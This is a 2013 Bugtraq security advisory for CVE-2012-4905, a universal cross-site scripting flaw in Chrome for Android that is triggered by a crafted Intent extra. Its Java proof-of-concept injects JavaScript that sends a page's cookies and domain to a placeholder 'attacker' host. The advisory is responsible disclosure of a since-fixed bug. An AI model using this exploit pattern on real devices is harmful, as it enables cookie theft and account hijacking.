[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201301071323.r07DN9sq031748@sf01web2.securityfocus.com>
Date: Mon, 7 Jan 2013 13:23:09 GMT
From: mbsdtest01@...il.com
To: bugtraq@...urityfocus.com
Subject: Chrome for Android - UXSS via com.android.browser.application_id
Intent extra
CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability
Overview:
By sending a crafted Intent to Chrome for Android, malicious Android apps can
inject javascript into arbitrary Web pages rendered in Chrome. Such kind of
UXSS-like vulnerabilities is often called Cross-Application Scripting.
Details:
When other Android apps send an Intent with javascript: URI to Chrome for
Android (v18.0.1025123), Chrome opens a new tab and execute the JavaScript
code in the context of the blank domain. Probably this is a countermeasure
against UXSS attacks.
However, this can be bypassed by an Intent with Extra data as below:
intent.putExtra("com.android.browser.application_id", "com.android.chrome");
With an Intent that contains such Extra data, Chrome loads javascript: URI
(written in the Intent) in the current foreground tab, not in a blank tab.
This enables malicious Android apps to execute arbitrary JavaScript code in
arbitrary domains on Chrome. As a result, other apps are able to steal Cookies
and so on.
Proof of Concept:
package jp.mbsd.terada.attackchrome1;
import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;
public class Main extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}
// get intent to invoke the chrome app
public Intent getIntentForChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
return intent;
}
public void doit() {
try {
// At first, force the chrome app to open a target Web page
Intent intent1 = getIntentForChrome("http://www.google.com/1");
startActivity(intent1);
// wait a few seconds
Thread.sleep(3000);
// JS code to inject into the target (www.google.com)
String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
+ "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
+ "document.body.appendChild(img);";
Intent intent2 = getIntentForChrome(jsURL);
// Trick to prevent Chrome from opening the JS URL in a different tab
intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
// Inject JS into the target Web page
startActivity(intent2);
}
catch (Exception e) {}
}
}
Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory
Recommendation:
Upgrade to the latest version.
Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813
Powered by blists - more mailing lists